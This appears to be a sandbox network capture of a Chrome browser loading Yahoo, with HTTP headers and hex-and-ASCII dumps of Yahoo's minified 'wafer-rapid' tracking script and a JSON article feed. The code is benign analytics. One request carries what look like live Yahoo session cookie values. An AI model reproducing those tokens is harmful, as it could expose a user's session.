                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC145INData Raw: 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6e 61 74 69 76 65 22 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6c 6f 61 64 65 64 22 2c 61 6c 6c 6f 77 50 72 65 66 65 74 63 68 3a 21 30 7d 3b 76 61 72 20 4f 3d 53 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 4f 28 7b 73 65 6c 65 63 74 6f 72 3a 4f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2e 73 65 6c 65 63 74 6f 72 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Class:"wafer-img-native",successClass:"wafer-img-loaded",allowPrefetch:!0};var O=S;t.default=new O({selector:O.prototype.configs.selector})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              89192.168.2.45111187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC539OUTGET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: PKLPi94GP5lTWV2wWQJtAwmUts6q30/To4HFTB8iYHOO+M5NaE8TYclX6Pqu4nDVphkv3e6+PVs=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: XB5XQ1FBNB1TM76C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 19:31:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 02 Jul 2024 08:11:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "da320d39602c7372e993ed8ca6026a92"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: D1eAABL3ZzqbxuHoTmJS4lz3o8UHw1Tk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 258154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 72 61 70 69 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 2c 6e 3d 21 30 2c 69 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 72 2e 70 75 73 68 28 6f 2e 76 61 6c 75 65 29 2c 21 74 7c 7c 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ngth;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},g=function(){function e(e,t){var r=[],n=!0,i=!1,a=void 0;try{for(var o,s=e[Symbol.iterator]();!(n=(o=s.next()).done)&&(r.push(o.value),!t||r.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 72 2d 6f 66 66 73 65 74 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 67 28 6c 2c 32 29 2c 75 3d 63 5b 30 5d 2c 66 3d 63 5b 31 5d 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 74 72 69 67 67 65 72 2d 69 6e 74 65 72 76 61 6c 22 29 3b 22 63 6c 69 63 6b 22 21 3d 3d 73 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 73 7c 7c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 2c 22 68 61 73 2d 77 61 66 65 72 2d 63 6c 69 63 6b 22 29 3b 76 61 72 20 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6d 65 74 68 6f 64 22 29 2c 68 3d 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6e 61 6d 65 22 29 7c 7c 22 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r-offset")||"").split(" "),c=g(l,2),u=c[0],f=c[1],d=e.getAttribute(I+"rapid-trigger-interval");"click"!==s&&"eachClick"!==s||e.classList.add("has-rapid-click","has-wafer-click");var p=e.getAttribute(I+"rapid-method"),h=(e.getAttribute(I+"rapid-name")||"")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 63 6f 6e 45 76 65 6e 74 22 3d 3d 3d 61 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 62 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 52 61 70 69 64 22 2c 65 6c 65 6d 3a 63 2c 6d 65 74 61 3a 7b 69 31 33 6e 3a 6c 2c 6e 61 6d 65 3a 73 2c 74 79 70 65 3a 22 62 65 61 63 6f 6e 45 76 65 6e 74 22 7d 7d 29 2c 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 22 3d 3d 3d 69 3f 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 20 76 69 65 77 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6c 2c 7b 6c 6c 33 3a 73 7d 29 29 3a 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 73 2c 6c 29 7d 65 6c 73 65 20 69 66 28 22 62 65 61 63 6f 6e 4c 69 6e 6b 56 69 65 77 73 22 3d 3d 3d 61 29 65 2e 62 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: conEvent"===a){var c=this._util.elem;b.emitLog({name:"WaferRapid",elem:c,meta:{i13n:l,name:s,type:"beaconEvent"}}),"intentionalView"===i?e.beaconEvent("intentional view",Object.assign({},l,{ll3:s})):e.beaconEvent(s,l)}else if("beaconLinkViews"===a)e.beaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 65 6d 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 29 26 26 74 68 69 73 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 52 61 70 69 64 4d 6f 75 73 65 45 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 65 64 7c 7c 28 56 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 3d 6a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 2c 31 30 30 2c 74 68 69 73 29 29 7d 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: em.classList.contains("has-rapid-click")&&this._beaconTrigger()}},{key:"handleRapidMouseEnter",value:function(){var e=this;this._destroyed||(V(this._state.mouseEnterTimeout,this),this._state.mouseEnterTimeout=j(function(){e._beaconTrigger()},100,this))}},
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 52 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),R=function e(t,r,n){null===t&&(t=Function.prototype);var i=Object.getOwnPropertyDescriptor(t,r);if(void 0===i){var a=Object.getPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6f 2e 72 65 6d 6f 76 65 4d 6f 64 75 6c 65 28 6c 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 74 72 61 63 6b 65 64 22 29 2c 21 30 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 2c 69 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 22 2e 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 3a 69 2c 6c 3d 65 2e 76 61 6c 69 64 61 74 65 44 65 6c 61 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o.removeModule(l),e.classList.remove("wafer-rapid-tracked"),!0},H=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},r=e.root,n=void 0===r?document:r,i=e.selector,a=void 0===i?".wafer-rapid-module":i,l=e.validateDelay
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 69 66 28 52 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 73 79 6e 63 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 46 28 65 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 71 28 6e 2c 72 29 3b 76 61 72 20 69 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 29 3b 69 2e 6c 65 6e 67 74 68 3e 30 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: if(R(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"sync",this).call(this,e),e){var r=this._state.elementInstances,n=F(e);if(n)return void q(n,r);var i=N(e.getElementsByClassName("wafer-rapid-module"));i.length>0&&Array.prototype.forEach.call(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC977INData Raw: 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2c 6e 3d 72 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 69 3d 72 2e 65 6c 65 6d 65 6e 74 57 69 74 68 49 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 65 64 49 6e 73 74 61 6e 63 65 73 3b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 26 26 7a 28 65 2c 6e 2c 69 29 3b 76 61 72 20 61 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 2c 6e 29 29 3b 61 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t.getPrototypeOf(t.prototype),"destroy",this).call(this);var r=this._state,n=r.elementInstances,i=r.elementWithIntentionalViewedInstances;e.classList.contains("wafer-rapid-module")&&z(e,n,i);var a=N(e.getElementsByClassName("wafer-rapid-module",n));a.leng


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              90192.168.2.45111487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1847OUTGET /caas/content/article/?uuid=763792a6-0264-4c09-8fdc-ad4e3aa042d8,bd87c24a-8c34-4ec0-a681-3564c02d7778,d965fa24-e6a0-3c55-8290-0262978e7d08,7b47460a-662a-3fa6-bc8a-19c327c6fce9,3eb87d51-a7f4-304f-a28c-91350aafdafa,c800f6b2-23f8-4294-bb16-2fcd31dd05bf,a574dfca-1c8e-3952-b021-11a2a439b3b7,7e3e7364-c32b-3510-b0fe-64f202383852,9edb1ffc-4d2e-3ef7-ad6e-b96ef1549f9d,99ea0d11-6a27-33c8-b25a-19733882bdc0&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-length: 826658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              etag: W/"c9d22-gGW/nVGkns0Le2vuLW0uAqIv5tY"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 6e 65 77 73 3b 74 72 65 6e 64 69 6e 67 3b 74 72 65 6e 64 69 6e 67 2d 6e 65 77 73 3b 75 70 64 61 74 65 2d 6d 65 3b 77 65 61 74 68 65 72 3b 6e 61 74 75 72 61 6c 70 68 65 6e 6f 6d 65 6e 61 3b 6e 61 74 75 72 65 61 6e 64 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 37 37 30 30 30 30 30 30 43 46 6f 47 79 41 41 4c 3b 72 65 76 73 70 3a 59 61 68 6f 6f 21 20 4e 65 77 73 3b 6c 70 73 74 61 69 64 3a 37 36 33
